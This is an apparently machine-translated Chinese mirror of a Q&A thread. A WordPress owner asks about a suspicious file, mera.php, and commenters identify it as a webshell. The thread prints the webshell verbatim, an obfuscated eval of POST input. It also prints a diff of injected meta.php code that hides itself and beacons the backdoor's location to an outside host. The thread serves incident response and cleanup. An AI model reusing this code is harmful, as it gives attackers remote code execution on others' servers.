WordPress网站被黑了? 可疑的PHP文件

I found a suspicious PHP file /wp-includes/mera.php

Content:

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

Could @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); possibly do something malicious?

doufen1890
doufen1890 感谢你们!我删除了文件并修复了meta.php(参见下面的答案)。为什么3个downvotestho?
接近 4 年之前 回复
duanming7961
duanming7961 该代码看起来像是运行任意代码。删除它,然后看看这个codex页面。
接近 4 年之前 回复
doukanxi4246
doukanxi4246 我不确定代码的作用,但该文件没有出现在任何wordpress文档中,因此除非您安装的某个应用程序使用它,否则它可能是恶意的。
接近 4 年之前 回复
dt1888
dt1888 str_rot13('riny')返回eval...
接近 4 年之前 回复

3个回答



立即删除文件!</ em> </ strong> </ p>

< p>此 PHP </ code>代码是经过修改的 webshel​​l 。 这些可能会被用来攻击其他网站,并可能导致严重的法律问题!</ p>

删除后,你应该</ em>也修复让文件进入的泄漏!</ p>
</ div>

展开原文

原文

Delete the file instantly!

This PHP code is a modified webshell. Those could be used to atack other websites and could lead to serious legal problems!

After deletion you should also fix the leak that let the file in!

Yes, the PHP script allows to run code on the Server.

Source: http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/

Through diff'ing with a clean WP tarball, I found meta.php was modified:

988,1004d987
<
< check_meta();
< function check_meta(){
<     $jp = __FILE__;
<     $jptime = filemtime($jp);
<
<     if(time() >= 1472456239){
<         $jp_c = file_get_contents($jp);
<         if($t = @strpos($jp_c,"check_meta();")) {
<             $contentp = substr($jp_c,0,$t);
<             if(@file_put_contents($jp, $contentp)){
<                 @touch($jp,$jptime);
<             }
<         }
<     }
<     @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php");
< }

FYI, here are the md5sums of infected files:

898af479fe6cc3af461c1878763d19f4  ./wp-includes/meta.php
b657d7c9d9be52771750091df0751fda  ./wp-includes/mera.php



您应该在您的网站上安装类似Wordfence插件的内容,这将连续检查所有插件和主题文件夹 发布版本。 它还有助于防止像这样的危险文件上传。 </ p>
</ div>

展开原文

原文

You should install something like the Wordfence plug in on your website, which will check all of the plug in and theme folders continuously against the official release versions. It will also help prevent dangerous file uploads like this.

Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
立即提问